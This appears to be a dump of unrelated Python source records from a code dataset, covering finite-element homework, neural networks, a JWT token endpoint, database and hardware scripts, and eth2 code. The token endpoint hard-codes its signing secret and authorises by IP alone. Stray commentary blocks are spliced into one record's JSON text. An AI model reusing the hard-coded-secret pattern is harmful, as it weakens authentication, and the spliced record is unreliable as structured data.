lambda x: x**2\nxi = f_load(x)\nu = Function(xi, v_h) \nassert np.abs(u(x[5]) - f_load(x[5])) < 1.e-6\nmid = (x[5] + x[6])/2\nassert np.abs(u(mid) - f_load(mid)) < 1.e-2\n\n# Verify projection\nf_load = lambda x: 2+x*0\nph_f = p_h(v_h, f_load)\nph_f2 = p_h(v_h, ph_f)\nassert np.max(np.abs(ph_f.xi - ph_f2.xi)) < 1.e-1\n\n# Analytical solution\nu = lambda x : np.sin(4.5*np.pi*x)\n# Build source file\nf = lambda x : (4.5*np.pi)**2*np.sin(4.5*np.pi*x)\n# Boundary conditions\nu_dirichlet = [u(0),u(1)]\n# Constant Conductivity\nsigma = lambda x : 1 + 0*x\n\n# Solve\nu_sol = solve_poisson_dirichelet(v_h, f, sigma, u_dirichlet)\n\n# Estimate error\nerr = lambda x: np.square(u_sol(x) - u(x))\nl2_err = np.sqrt(integrate.quad(err, 0.0,1.)[0])\n\nprint(\"L^2 error using %d points is %.6f\"% (v_h.dim, l2_err))\n# this should be quite large\n\n# Use a finer mesh\nx = np.linspace(0,1,41)\nmesh = Mesh(x)\nv_h = V_h(mesh)\n\n# Solve\nu_sol = solve_poisson_dirichelet(v_h, f, sigma, u_dirichlet)\n\n# Estimate error\nerr = lambda x: np.square(u_sol(x) - u(x))\nl2_err = np.sqrt(integrate.quad(err, 0.0,1.)[0])\n\n# Debugging step\nif False:\n    for i in range(21):\n        print([u_sol(i/20),u(i/20)])\n    \n# print the error\nprint(\"L^2 error using %d points is %.6f\"% (v_h.dim, l2_err))\n\n\n# # Problem B: Showcase Projection Convergence Properties\n\n# # Part B.1: h^4 Error Convergence\n\n# In[7]:\n\n\n# Define f\nf=lambda x : np.cos(12*np.pi*x)\n\n# Take Samples\ndata=[]\nfor n in range(10,105,5):\n    # Define Mesh\n    x = 
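Since `p_h` computes the L² projection by solving M ξ = b, a cheap consistency check is that the assembled system's residual vanishes for the returned coefficients. A short illustration using the classes defined above (names suffixed `_demo` are new):

```python
x_demo = np.linspace(0, 1, 21)
v_h_demo = V_h(Mesh(x_demo))
f_demo = lambda x: np.sin(np.pi * x)

b_demo = load_vector(v_h_demo, f_demo)
M_demo = spsp.csc_matrix(mass_matrix(v_h_demo))
xi_demo = spsolve(M_demo, b_demo)
assert np.max(np.abs(M_demo @ xi_demo - b_demo)) < 1e-12
```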
np.linspace(0,1,n+1)\n mesh = Mesh(x)\n v_h = V_h(mesh)\n\n # Calculate Projection\n ph_f = p_h(v_h, f)\n\n # Estimate error\n err = lambda x : np.square(f(x) - ph_f(x))\n l2_err_sq = integrate.quad(err, 0.0,1.)[0]\n\n # Print\n data.append([1/n,l2_err_sq])\ndata=np.array(data)\n\n# Data for plotting\nfig,pl = plt.subplots(2,1)\nfor i in range(len(pl)):\n pl[i].plot(data[:,0],1.2e+3*data[:,0]**3,\n label=\"h^3 reference\",color=\"yellow\")\n pl[i].plot(data[:,0],1.6e+5*data[:,0]**5,\n label=\"h^5 reference\",color=\"red\")\n pl[i].plot(data[:,0],1.6e+4*data[:,0]**4,\n label=\"h^4 reference\",color=\"orange\")\n pl[i].plot(data[:,0],data[:,1],\n label=\"Results\",color=\"turquoise\")\n \n pl[i].grid()\n if i==0:\n pl[i].set(ylabel=\"$L^2$ Squared Error\",\n title=\"Error by h\")\n pl[i].legend()\n elif i==len(pl)-1:\n pl[i].set(xlabel=\"h\")\n \n data = data[int(len(data)/2):]\n\nif save:\n fig.savefig(\"B.1.png\")\nplt.show()\n\n\n# # Part B.2: Second Derivative Norm Convergence\n\n# In[8]:\n\n\n# Take Samples\ndata=[]\nfor c in range(1,21):\n # Define f\n f=lambda x : np.cos(c*np.pi*x)\n # Define f''\n f_2der=lambda x : -(c*np.pi)**2*np.cos(c*np.pi*x)\n \n # Define Mesh\n x = np.linspace(0,1,51)\n mesh = Mesh(x)\n v_h = V_h(mesh)\n\n # Calculate Projection\n ph_f = p_h(v_h, f)\n\n # Estimate error\n err = lambda x : np.square(f(x) - ph_f(x))\n l2_err_sq = integrate.quad(err, 0.0,1.)[0]\n f2 = lambda x : np.square(f_2der(x))\n # We can sample the whole function because h_i = h_j\n l2_2der_sq = integrate.quad(f2, 0.0,1.)[0]\n\n # Print\n data.append([l2_2der_sq,l2_err_sq])\ndata=np.array(data)\n\n# Data for plotting\nfig,pl = plt.subplots(2,1)\nfor i in range(len(pl)):\n pl[i].plot(data[:,0],data[:,1],\n label=\"Results\",color=\"turquoise\")\n \n pl[i].grid()\n if i==0:\n pl[i].set(ylabel=\"$L^2$ Squared Error\",\n title=\"Error by h\")\n pl[i].legend()\n elif i==len(pl)-1:\n pl[i].set(xlabel=\"$L^2$ Squared $f''$ Norm\")\n \n data = data[:int(len(data)/8)]\n\nif save:\n fig.savefig(\"B.2.png\")\nplt.show()\n\n\n# ### Part B.3: Counter-Example\n\n# In[9]:\n\n\n# Take Samples\ndata=[]\nfor c in range(1,21):\n # Define f (Can't use something like 1/x; Homogeneous/Dirichlet)\n f=lambda x : c/x\n # Define f''\n f_2der=lambda x : c*2/(x**3)\n \n # Define Mesh\n x = np.linspace(0,1,51)\n mesh = Mesh(x)\n v_h = V_h(mesh)\n\n # Calculate Projection\n ph_f = p_h(v_h, f)\n\n # Estimate error\n err = lambda x : np.square(f(x) - ph_f(x))\n l2_err_sq = integrate.quad(err, 0.0,1.)[0]\n f2 = lambda x : np.square(f_2der(x))\n # We can sample the whole function because h_i = h_j\n l2_2der_sq = integrate.quad(f2, 0.0,1.)[0]\n\n # Print\n data.append([l2_2der_sq,l2_err_sq])\ndata=np.array(data)\n\n# Data for plotting\nfig,pl = plt.subplots(2,1)\nfor i in range(len(pl)):\n pl[i].plot(data[:,0],data[:,1],\n label=\"Results\",color=\"turquoise\")\n \n pl[i].grid()\n if i==0:\n pl[i].set(ylabel=\"$L^2$ Squared Error\",\n title=\"Error by h\")\n pl[i].legend()\n elif i==len(pl)-1:\n pl[i].set(xlabel=\"$L^2$ Squared $f''$ Norm\")\n \n data = data[:int(len(data)/8)]\n\nif save:\n fig.savefig(\"B.3.png\")\nplt.show()\n\n\n# # Problem C\n\n# ### Part C.a: Estimate Showcase\n\n# In[10]:\n\n\n# Analytical solution\nu = lambda x : np.sin(2*np.pi*x)\n# Build source file\nf = lambda x : (2*np.pi)**2*np.sin(2*np.pi*x)\n# Boundary conditions\nu_dirichlet = [u(0),u(1)]\n# Constant Conductivity\nsigma = lambda x : 1 + 0*x\n\n# Take Samples\ndata=[]\nfor n in range(10,105,5):\n # Create Mesh\n x = np.linspace(0,1,n+1)\n mesh = 
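Rather than only eyeballing the h³/h⁴/h⁵ reference curves, the observed convergence order can be read off as the slope of log(error) against log(h). A sketch (run it on `data` before the plotting loop trims it):

```python
# For the L^2 projection of a smooth f the error is O(h^2), so the squared
# error collected above should scale like h^4, i.e. a slope of about 4.
slope, intercept = np.polyfit(np.log(data[:, 0]), np.log(data[:, 1]), 1)
print("observed order: %.2f (expect about 4)" % slope)
```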
Mesh(x)\n v_h = V_h(mesh)\n\n # Solve\n u_sol = solve_poisson_dirichelet(v_h, f, sigma, u_dirichlet)\n\n # Estimate error\n diff = lambda x : u(x)-u_sol(x)\n # Take an FD estimation of (u - u_h)'\n err = lambda x : np.square(derivative(diff,x,dx=1e-3/n,n=1))\n l2_err_sq = integrate.quad(err, 0.0,1.)[0]\n \n data.append([1/n,l2_err_sq])\ndata=np.array(data)\n\n# Data for plotting\nfig,pl = plt.subplots(2,1)\nfor i in range(len(pl)):\n pl[i].plot(data[:,0],7e+1*data[:,0]**2,\n label=\"h^2 reference\",color=\"orange\")\n pl[i].plot(data[:,0],data[:,1],\n label=\"Results\",color=\"turquoise\")\n pl[i].grid()\n if i==0:\n pl[i].set(ylabel=\"$L^2$ Squared Derivative Error\",\n title=\"Error by h\")\n pl[i].legend()\n elif i==len(pl)-1:\n pl[i].set(xlabel=\"h\")\n \n data = data[int(len(data)/2):]\n\nif save:\n fig.savefig(\"C.a.png\")\nplt.show()\n\n\n# ### Part C.b.1: Adaptive Mesh Comparison\n\n# In[ ]:\n\n\n# Define domain length\nL=2\n\n# Create sources\nsigma = lambda x : .1 + 0*x\nf = lambda x : np.exp(-(x-L/2)**2/(2*sigma(x)))\nu_dirichlet = [0,0]\n\n# Find reference solution\nx_fine = np.linspace(0,L,1001)\nv_h_fine = V_h(Mesh(x_fine))\nu=solve_poisson_dirichelet(v_h_fine, f, sigma, u_dirichlet)\n\n# Create initial mesh\nx = np.linspace(0,L,11)\nv_h = V_h(Mesh(x))\n\nl2_err = 9e+3; it=0\nwhile True:\n # Iterate\n v_h = V_h(Mesh(x))\n \n # Estimate solution\n u_h=solve_poisson_dirichelet(v_h, f, sigma, u_dirichlet)\n\n # Compute error on current mesh\n err = lambda x : np.square(u(x)-u_h(x))\n l2_err = np.sqrt(integrate.quad(err,0,L)[0])\n \n if l2_err < 1e-3:\n break\n \n \"\"\"\n # Element residual\n resid = np.zeros(len(x))\n for i in range(1,len(x)-1):\n h = max(x[i+1]-x[i],x[i]-x[i-1])\n d2 = (u(x[i]-h)-2*u(x[i])+u(x[i]+h))/h**2\n resid[i] = abs(f(x[i]) + .1*d2)\n \"\"\"\n \n # Element residual\n rho = np.zeros(len(x)-1)\n for i in range(len(x)-1):\n h = x[i+1] - x[i]\n f_sq = lambda x : np.square(f(x))\n l2_i = np.sqrt(integrate.quad(f_sq,x[i],x[i+1])[0])\n rho[i] = h*l2_i\n \n \"\"\"\n # Refine (ref will never be 0 or L unless exact)\n ref = np.argmax(resid+1)\n x=np.insert(x,ref+1,(x[ref]+x[ref+1])/2)\n x=np.insert(x,ref,(x[ref-1]+x[ref])/2)\n \"\"\"\n \n # Refine\n alpha = .9\n for i in range(len(x)-1):\n if rho[i] > alpha*np.max(rho):\n x=np.append(x,(x[i]+x[i+1])/2)\n x=np.sort(x)\n \n it += 1\n #print(l2_err)\n\nfig,pl = plt.subplots()\npl.plot(x_fine,u(x_fine),label=\"Fine Solution\",color=\"orange\")\npl.plot(x,u_h(x),label=\"Results\",color=\"turquoise\")\npl.set(title=\"u Estimation (%d refinements, %d intervals)\" % (it,len(x)-1))\npl.legend()\n\nif save:\n fig.savefig(\"C.b.1.png\")\nplt.show()\n\n\n# In[ ]:\n\n\n# Try and compare for multiple L\ndata = []\nfor L in range(1,4):\n # Create sources\n sigma = lambda x : .1 + 0*x\n f = lambda x : np.exp(-(x-L/2)**2/(2*sigma(x)))\n u_dirichlet = [0,0]\n\n # Find reference solution\n x_fine = np.linspace(0,L,1001)\n v_h_fine = V_h(Mesh(x_fine))\n u=solve_poisson_dirichelet(v_h_fine, f, sigma, u_dirichlet)\n\n # Create initial mesh\n x = np.linspace(0,L,11)\n v_h = V_h(Mesh(x))\n\n l2_err = 9e+3; it=0\n while True:\n # Iterate\n v_h = V_h(Mesh(x))\n\n # Estimate solution\n u_h=solve_poisson_dirichelet(v_h, f, sigma, u_dirichlet)\n\n # Compute error on current mesh\n err = lambda x : np.square(u(x)-u_h(x))\n l2_err = np.sqrt(integrate.quad(err,0,L)[0])\n\n if l2_err < 1e-3:\n break\n\n \"\"\"\n # Element residual\n resid = np.zeros(len(x))\n for i in range(1,len(x)-1):\n h = max(x[i+1]-x[i],x[i]-x[i-1])\n d2 = 
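The refinement rule above marks every interval whose indicator ρᵢ = hᵢ·‖f‖_{L²(Iᵢ)} exceeds a fixed fraction α of the largest indicator. An alternative worth comparing is Dörfler (bulk) marking, which refines the smallest set of elements carrying a fixed share of the total estimated error; a sketch, not in the original notebook:

```python
def dorfler_mark(rho, theta=0.5):
    order = np.argsort(rho)[::-1]   # element indices, largest indicator first
    total = np.sum(rho ** 2)
    marked, acc = [], 0.0
    for i in order:
        marked.append(i)
        acc += rho[i] ** 2
        if acc >= theta * total:    # stop once theta of the total error is covered
            break
    return marked
```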
(u(x[i]-h)-2*u(x[i])+u(x[i]+h))/h**2\n resid[i] = abs(f(x[i]) + .1*d2)\n \"\"\"\n\n # Element residual\n rho = np.zeros(len(x)-1)\n for i in range(len(x)-1):\n h_i = x[i+1] - x[i]\n f_sq = lambda x : np.square(f(x))\n l2_i = np.sqrt(integrate.quad(f_sq,x[i],x[i+1])[0])\n rho[i] = h_i*l2_i\n\n \"\"\"\n # Refine (ref will never be 0 or L unless exact)\n ref = np.argmax(resid+1)\n x=np.insert(x,ref+1,(x[ref]+x[ref+1])/2)\n x=np.insert(x,ref,(x[ref-1]+x[ref])/2)\n \"\"\"\n\n # Refine\n alpha = .9\n for i in range(len(x)-1):\n if rho[i] > alpha*np.max(rho):\n x=np.append(x,(x[i]+x[i+1])/2)\n x=np.sort(x)\n\n it += 1\n intervals = len(x)-1\n \n l2_err = 9e+3; n=20#intervals\n while True:\n # Find reference solution\n x = np.linspace(0,L,n+1)\n v_h = V_h(Mesh(x))\n u_h = solve_poisson_dirichelet(v_h, f, sigma, u_dirichlet)\n \n # Compute error on current mesh\n err = lambda x : np.square(u(x)-u_h(x))\n l2_err = np.sqrt(integrate.quad(err,0,L)[0])\n \n if l2_err < 1e-3:\n break\n \n n += 5\n \n data.append([L,n,intervals])\n #print(data[-1])\n \ndata = np.array(data)\nfig,pl = plt.subplots()\npl.plot(data[:,0],data[:,1],label=\"Equispaced\",color=\"orange\")\npl.plot(data[:,0],data[:,2],label=\"Dyadic\",color=\"turquoise\")\npl.set(xlabel=\"L\",ylabel=\"$L^2$ Squared Derivative Error\",title=\"L vs Number of Intervals\")\npl.legend()\n\nif save:\n fig.savefig(\"C.b.2.png\")\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Kalafut_Noah-Cohen_HW1/hw_1.py","file_name":"hw_1.py","file_ext":"py","file_size_in_byte":17865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"17619","text":"\"\"\"\nSet parameters for neural network model here. Test how many different \nconvolutional and linear layers is optimal for your task. Remember the larger\nthe number of outputs the more ram is needed. 
Also choose an activation function,\nF.relu is standard.\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass Net(nn.Module):\n    def __init__(self):\n        super().__init__()\n        self.conv1 = nn.Conv2d(1, 32, 5) # 1 image, 32 outputs, 5x5 kernel\n        self.conv2 = nn.Conv2d(32, 64, 5)\n        self.conv3 = nn.Conv2d(64, 128, 5)\n\n        # Pass through random data to find shape of conv3 output\n        x = torch.randn(128, 72).view(-1, 1, 128, 72)\n        self._to_linear = None\n        self.convs(x)\n\n        self.fc1 = nn.Linear(self._to_linear, 512) # flattening\n        self.fc2 = nn.Linear(512, 2) # 2 output classes\n\n    def convs(self, x):\n        \"\"\"Applies activation function on convolutional layers of network\"\"\"\n        x = F.max_pool2d(F.relu(self.conv1(x)), (2,2)) # max pooling over 2x2\n        x = F.max_pool2d(F.relu(self.conv2(x)), (2,2))\n        x = F.max_pool2d(F.relu(self.conv3(x)), (2,2))\n\n        # Finds shape for flattening\n        if self._to_linear is None:\n            self._to_linear = x[0].shape[0]*x[0].shape[1]*x[0].shape[2]\n        return x\n\n    def forward(self, x):\n        \"\"\"Applies activation function on linear layers of network\"\"\"\n        x = self.convs(x)\n        x = x.view(-1, self._to_linear) # .view is reshape, flattens x before\n        x = F.relu(self.fc1(x))\n        x = self.fc2(x)\n        # return F.softmax(x, dim=1)\n        return x\nnet = Net()\nprint(net)","sub_path":"detector/nn_model.py","file_name":"nn_model.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"231403670","text":"\n# for converting mp3 to wav files\nimport os\nfrom pydub import AudioSegment\n\nos.chdir(\"C:/Users/Arzoo/Desktop/ScalableProject3/images\")\n\naudio_files = os.listdir()\n\n# picking up mp3 audio files in the folder \nfor file in audio_files:\n    name, ext = os.path.splitext(file)\n    if ext == \".mp3\":\n        mp3_sound = AudioSegment.from_mp3(file)\n        # saving the wav files\n        mp3_sound.export(\"{0}.wav\".format(name), format=\"wav\")","sub_path":"ConvertMp3ToWav.py","file_name":"ConvertMp3ToWav.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"565561512","text":"from flask import request\n# from flask_restful import Resource\nfrom flask_restplus import Resource, Namespace\n\nimport datetime\nimport jwt\n\n'''\nparkjp 18.12.11\nREST CRUD implementation\nC(POST) : token-related service ...\nR(GET) : token-related service ...\nU(PUT) : token-related service ...\nD(DELETE) : token-related service ...\n'''\nsecretKey = 'ai_data_discovery_crawler'\n\napi = Namespace('register', description='management')\nauth_ip = ['localhost', '127.0.0.1']\nclass tokenRegister(Resource):\n\n    def __init__(self, *args, **kwargs):\n        logger = kwargs['logger']\n        self.logger = logger\n        self.api = api\n\n    # Issue a new token\n    def post(self):\n\n        # '''\n        # a token should be issued after validating the encrypted id/password from the header\n        # '''\n        id = ''\n        password = ''\n\n        # issue a token only when the request IP is in the allowed list\n\n        if request.remote_addr in auth_ip:\n\n            issuer = 'parkjp'\n\n            subject = 'ai_data_discovery'\n            # token expiration date\n            date_time_obj = datetime.datetime\n            exp_time = date_time_obj.timestamp(date_time_obj.utcnow() + datetime.timedelta(days=1))\n            scope = ['crawler']\n\n            payload = {\n                'sub': subject,\n                'iss': issuer,\n                'exp': int(exp_time),\n                'scope': scope,\n                'aud': request.remote_addr\n            }\n\n            token = jwt.encode(payload, secretKey, algorithm='HS256')\n\n            return {\n                'msg': 'A new token has been created.',\n                'access_token': str(token)\n            }\n\n        else:\n            return {\n                'msg': 'Check the token issuance requirements'\n            }\n\n
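For context, the natural counterpart to this endpoint is verifying a token on later requests. A hedged sketch of what that could look like with PyJWT (`verify_token` is hypothetical and not part of this module; `jwt.decode` checks `exp` automatically and `aud` when an audience is supplied):

```python
def verify_token(token, client_ip):
    try:
        payload = jwt.decode(token, secretKey, algorithms=['HS256'],
                             audience=client_ip)
        return payload  # contains sub, iss, exp, scope, aud
    except jwt.ExpiredSignatureError:
        return {'msg': 'Token has expired'}
    except jwt.InvalidTokenError:
        return {'msg': 'Invalid token'}
```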
}\n\n","sub_path":"register/token/tokenRegister.py","file_name":"tokenRegister.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"424100805","text":"import mysql.connector\nfrom conf import load_config\nimport app\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass MysqlDB(object):\n def __init__(self):\n self.config = {\n 'host': app.config.MYSQL_HOST, 'user': app.config.MYSQL_USERNAME,\n 'passwd': app.config.MYSQL_PASSWORD, 'db': app.config.MYSQL_DB,\n 'port': app.config.MYSQL_PORT\n }\n\n def select(self, sql, args, size=None):\n conn = mysql.connector.connect(**self.config)\n logger.info('sql:%s' % sql)\n logger.info(args)\n logger.info(size)\n try:\n cur = conn.cursor()\n cur.execute(sql.replace('?', '%s'), args or ())\n if size:\n if size == 1:\n rs = cur.fetchone()\n else:\n rs = cur.fetchmany(size)\n else:\n rs = cur.fetchall()\n logger.info('rows returned:%s' % len(rs))\n return rs\n finally:\n cur.close()\n conn.close()\n\n def execute(self, sql, args):\n conn = mysql.connector.connect(**self.config)\n logger.info('sql:%s' % sql)\n logger.info(args)\n try:\n cur = conn.cursor()\n cur.execute(sql.replace('?', '%s'), args)\n affected = cur.rowcount\n conn.commit()\n except Exception as e:\n raise e\n finally:\n cur.close()\n conn.close()\n return affected\n\n","sub_path":"app/db/mysqldb.py","file_name":"mysqldb.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"91275742","text":"import torch\nfrom torch import nn, optim\nimport numpy as np\nimport torch.utils.data as Data\nimport time\n\nclass RLNet(nn.Module):\n def __init__(self):\n super(RLNet, self).__init__()\n self.conv = nn.Sequential(\n # 1 * 15 * 15\n nn.Conv2d(1, 4, 3), # 4 * 13 * 13\n nn.ReLU(),\n nn.Conv2d(4, 16, 3), # 16 * 11 * 11\n nn.ReLU(),\n nn.Conv2d(16, 64, 3), # 64 * 9 * 9\n nn.ReLU(),\n nn.Conv2d(64, 256, 3, padding=1), # 256 * 9 * 9\n nn.ReLU(),\n nn.MaxPool2d(3),\n # nn.Conv2d(256, 1024, 3), # 1024 * 7 * 7\n # nn.ReLU(), \n # nn.Conv2d(1024, 1024, 3), # 1024 * 5 * 5\n # nn.ReLU(),\n # nn.Conv2d(1024, 1024, 3), # 1024 * 3 * 3\n # nn.ReLU(),\n nn.Conv2d(256, 1024, 3), # 1024 * 1 * 1\n nn.ReLU(),\n )\n self.fc = nn.Sequential(\n nn.Linear(1024, 1024),\n nn.ReLU(),\n nn.Dropout(p=0.5),\n nn.Linear(1024, 512),\n nn.ReLU(),\n nn.Linear(512, 15**2)\n )\n\n def forward(self, board):\n # print(board.shape)\n self.eval()\n first_ = self.conv(board.float())\n first_ = first_.view(board.shape[0],-1)\n output = self.fc(first_)\n self.train()\n return output\n@torch.no_grad()\ndef test(net,board,device):\n net = net.to(device)\n board = board.view(1,1,15,15)\n board = board.to(device)\n probs = net(board)\n probs_softmax = nn.Softmax(dim=1)(probs)\n probs_softmax = probs_softmax.cpu()\n probs_rank_index = np.argsort(probs_softmax.numpy())\n for index in probs_rank_index[0][::-1]:\n x = int(index / 15)\n y = int(index % 15)\n if(board[0,0,x,y]==0):\n return x,y\n return -1,-1\n\ndef train(net,data_iterator,iswin,optim,device,num_epochs):\n net = net.to(device)\n print(\"train on \",device)\n loss = torch.nn.CrossEntropyLoss()\n\n for epoch in range(num_epochs):\n \n for X,y in data_iterator:\n X = X.to(device)\n y = y.to(device)\n label = torch.zeros((len(y)),device=device,dtype=torch.long)\n for i in range(len(y)):\n label[i] = int(y[i][0]*15 + y[i][1])\n y_hat = net(X)\n l = loss(y_hat,label)\n 
            y_hat = net(X)\n            l = loss(y_hat,label)\n            optim.zero_grad()\n            l.backward()\n            optim.step()","sub_path":"RL/RLNet.py","file_name":"RLNet.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"628304729","text":"import mariadb\nimport sys\nimport time\nfrom gpiozero import MotionSensor, LED\nfrom datetime import datetime\nfrom signal import pause\n\noutpin = LED(22)\npir = MotionSensor(27, sample_rate=1)\n\nFAN_ON_DURATION = 10 * 60\t\t# 10 min\n\ndef printMessage(msg):\n\tprint(f\"{str(datetime.now())} - \" + msg)\n\nprintMessage(\"Motion detection init...\")\n\ndef runfan():\n\toutpin.on()\n\tprintMessage(\"fan activated.\")\n\ttime.sleep(FAN_ON_DURATION)\n\toutpin.off()\n\tprintMessage(\"fan de-activated\")\n\n# log a detection event to the database\ndef logdb():\n\tepoch = int(time.time())\n\ttime_h = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(epoch))\n\ttry:\n\t\tcur.execute(\n\t\t\t\"INSERT INTO motion_detection (detector_name, detection_time_epoch, detection_time) VALUES (?, ?, ?)\",\n\t\t\t('pz-cat-litter', epoch, time_h))\n\t\tconn.commit()\n\t\tprintMessage(f\"inserted id: {cur.lastrowid}\")\n\texcept mariadb.Error as e:\n\t\tprintMessage(f\"error: {e}\")\n\n\ndef on_motion_detected():\n\tlogdb()\n\trunfan()\n\n\n# Establish a connection\n# NOTE: username and password are not defined anywhere in this script; they\n# must be supplied (e.g. read from a config file or environment variables)\n# before this connect call will work.\ntry:\n    conn = mariadb.connect(\n        user=username,\n        password=password,\n        host=\"localhost\",\n        port=3306,\n        database=\"exports\"\n\n    )\n    cur = conn.cursor()\nexcept mariadb.Error as e:\n    printMessage(f\"error connecting to MariaDB Platform: {e}\")\n    sys.exit(1)\n\nprintMessage(\"motion detection ready...\")\n\nwhile True:\n\tpir.wait_for_motion()\n\ton_motion_detected()\n","sub_path":"pi-cat-litter/motion_detection.py","file_name":"motion_detection.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"610969921","text":"from file_read import *\nfrom file_create import *\nfrom container import *\nfrom container_decorator import *\nfrom factory import *\nimport argparse\nimport sys\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('input')\n    parser.add_argument('-o', '--output')\n    p = parser.parse_args(sys.argv[1:])\n\n    file_in = read(p.input)\n    cont = ContainerDecorator(Container())\n    fct = Factory()\n    cont.read(file_in, fct)\n\n    file_out = create(p.output)\n    file_out.write('Filled container:\\n')\n\n    cont.write_round(file_out)\n\n    file_out.write('\\nEmpty container:\\n')\n    cont.clear()\n    cont.write(file_out)\n\n    file_out.close()\n\n    print('Processing completed successfully!')\n\nif __name__ == '__main__':\n    main()\n\n\n\n","sub_path":"_auto/lab6_2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"635302181","text":"import torch\nimport torch.nn as nn\n\n\"\"\"\n    t = expansion factor\n    c = number of output channels\n    n = repeat count\n    s = stride\n    t    c    n    s\n\"\"\"\nMobileNetV1_arch = [\n    [1, 16, 1, 1],\n    [6, 24, 2, 2],\n    [6, 32, 3, 2],\n    [6, 64, 4, 2],\n    [6, 96, 3, 1],\n    [6, 160, 3, 2],\n    [6, 320, 1, 1],\n]\n\nclass DepthSepConvBlock(nn.Module):\n    def __init__(self,in_channels,out_channels,stride):\n        super(DepthSepConvBlock,self).__init__()\n        self.depthwise = nn.Sequential(\n            nn.Conv2d(in_channels,in_channels,kernel_size=3,stride=stride,padding=1,groups=in_channels,bias=False),\n            nn.BatchNorm2d(in_channels),\n            nn.ReLU6(inplace=True),\n        )\n        self.pointwise = nn.Sequential(\n            
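# (added note, not in the original file) Why this depthwise + pointwise pair
# is cheap: a standard 3x3 convolution mapping C_in -> C_out channels needs
# 9*C_in*C_out weights, while the factorization used here needs only
# 9*C_in (depthwise) + C_in*C_out (pointwise). For C_in=64, C_out=128 that
# is 73728 vs 8768 weights, roughly an 8.4x reduction.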
nn.Conv2d(in_channels,out_channels,kernel_size=1,stride=1,bias=False),\n nn.BatchNorm2d(out_channels),\n )\n \n def forward(self,x):\n x = self.depthwise(x)\n x = self.pointwise(x)\n return x\n \n \n\nclass BottleneckBlock(nn.Module):\n def __init__(self,in_channels,out_channels,expand_ratio,stride):\n super(BottleneckBlock,self).__init__()\n self.stride = stride\n self.expand_layer = nn.Sequential(\n nn.Conv2d(\n in_channels,\n in_channels*expand_ratio,\n kernel_size=1,\n stride=1,\n padding=0,\n bias=False,\n ),\n nn.BatchNorm2d(in_channels*expand_ratio),\n nn.ReLU6(inplace=True),\n )\n self.depthwise_separable_layer = DepthSepConvBlock(\n in_channels=in_channels*expand_ratio,\n out_channels=out_channels,\n stride=stride,\n )\n \n def forward(self,x):\n out = self.expand_layer(x)\n out = self.depthwise_separable_layer(out)\n if self.stride==1 and x.shape[1:] == out.shape[1:]:\n return x + out\n return out\n\nclass MobileNetV2(nn.Module):\n def __init__(self,num_classes=10):\n super(MobileNetV2,self).__init__()\n self.first_conv_channels = 32\n self.last_conv_channels = 1280\n \n self.initial_conv = nn.Sequential(\n nn.Conv2d(\n in_channels = 3,\n out_channels = self.first_conv_channels,\n kernel_size = 3,\n stride = 2,\n padding = 1\n ),\n nn.BatchNorm2d(self.first_conv_channels),\n )\n \n self.bottleneck_blocks = self.make_bottleneck(MobileNetV1_arch)\n \n self.last_layers = nn.Sequential(\n nn.Conv2d(\n in_channels=320,\n out_channels=1280,\n kernel_size=1,\n stride=1,\n ),\n nn.BatchNorm2d(1280),\n nn.ReLU6(inplace=True),\n nn.AvgPool2d(7),\n nn.Conv2d(\n in_channels=1280,\n out_channels=num_classes,\n kernel_size=1,\n )\n )\n \n \n def make_bottleneck(self,arch):\n in_channels = 32\n bottleneck = []\n for _,(t,c,n,s) in enumerate(arch):\n for i in range(n):\n if i == 1:\n s=1\n if i+1 != n:\n bottleneck.append(BottleneckBlock(in_channels,in_channels,t,s))\n else: \n bottleneck.append(BottleneckBlock(in_channels,c,t,s))\n in_channels = c\n return nn.Sequential(*bottleneck)\n \n def forward(self,x):\n x = self.initial_conv(x)\n x = self.bottleneck_blocks(x)\n x = self.last_layers(x).view(x.shape[0],-1)\n return x\n \n\nif __name__ == '__main__':\n net = MobileNetV2()\n x = torch.randn(6,3,224,224)\n print(net(x).shape)","sub_path":"PyTorch/Classification/mobilenetv2/arch.py","file_name":"arch.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"573197513","text":"from typing import (\n Iterable,\n)\nfrom eth_utils import (\n to_tuple,\n ValidationError,\n)\n\nfrom eth2.beacon.configs import (\n BeaconConfig,\n CommitteeConfig,\n)\nfrom eth2.beacon.validator_status_helpers import (\n initiate_validator_exit,\n slash_validator,\n)\nfrom eth2.beacon.typing import (\n ValidatorIndex,\n)\nfrom eth2.beacon.committee_helpers import (\n slot_to_epoch,\n)\nfrom eth2.beacon.types.attester_slashings import AttesterSlashing\nfrom eth2.beacon.types.blocks import BaseBeaconBlock\nfrom eth2.beacon.types.pending_attestation_records import PendingAttestationRecord\nfrom eth2.beacon.types.states import BeaconState\n\nfrom .block_validation import (\n validate_attestation,\n validate_attester_slashing,\n validate_proposer_slashing,\n validate_slashable_indices,\n validate_voluntary_exit,\n)\n\n\ndef process_proposer_slashings(state: BeaconState,\n block: BaseBeaconBlock,\n config: BeaconConfig) -> BeaconState:\n if len(block.body.proposer_slashings) > config.MAX_PROPOSER_SLASHINGS:\n raise ValidationError(\n 
